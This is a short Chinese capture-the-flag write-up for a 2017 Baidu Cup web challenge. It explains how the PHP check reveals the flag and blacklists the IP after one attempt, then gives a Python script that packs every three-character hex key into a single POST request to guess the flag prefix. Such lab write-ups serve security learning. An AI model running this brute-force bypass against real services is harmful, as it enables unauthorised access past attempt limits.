【百度杯”2017年春秋欢乐赛】web 攻击

题目链接：https://www.ichunqiu.com/battalion?t=1&r=57451

分析代码：
$_SEVER的解析：https://blog.csdn.net/weixin_45844670/article/details/108052294

(1)若当前IP与$ ip变量的内容相同，则提示信息直接退出。
(2)当POST中某id的键值等于’attack’时，打印$flag。这个id为 $flag的第6个位置开始，长度为3的一个字符串。（之所以是从第6个，是因为flag{已经占用了5个字符，说白了就是让你匹配flag值的前三个）
(3)如果不满足(2)，则检查POST的变量个数，大于0则把你当前的IP加入到黑名单中（故一个IP只能攻击一次，失败了就要重新创建题目）

附脚本：

import requests
a = "1234567890abcdef"
data = {}
for i in a:
    for j in a:
        for k in a:
            data[i+j+k]="attack"
print(data)        
r=requests.post(url,data=data)
print(r.text)

里面的url换成自己的